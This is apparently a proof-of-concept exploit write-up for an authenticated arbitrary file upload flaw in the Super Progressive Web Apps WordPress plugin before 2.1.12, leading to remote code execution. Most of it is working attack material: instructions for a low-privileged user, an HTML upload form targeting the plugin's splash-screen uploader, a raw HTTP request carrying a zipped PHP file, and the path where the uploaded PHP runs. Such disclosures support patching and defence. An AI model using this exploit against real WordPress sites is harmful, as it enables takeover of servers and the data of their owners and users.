Super Progressive Web Apps < 2.1.12 - Authenticated (Low Privileged) Arbitrary File Upload to RCE

Login to the blog as a low privilege user (such as subscriber), save the code below in an HTML file (and replace the example.com by the correct domain), then open it in the same browser used to log on to the blog and select an archive of a PHP file

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
    Zipped PHP File
    <input type="file" name="file"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42382098251599243971534803211
Content-Length: 595
Connection: close
Cookie: [low privilege cookies]
Upgrade-Insecure-Requests: 1

-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="action"

superpwa_splashscreen_uploader
-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="file"; filename="134.zip"
Content-Type: application/zip

PK���‰IE������������ �134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�
õ
�����³±/È(PHMÎÈWPwsôôquQ·V°·ã�PK^Ý}u������PK
���‰IE^Ý}u������� ���������ÿ����134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�
õ
�����PK����
�
�\���v�����
-----------------------------42382098251599243971534803211--


PHP will be at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php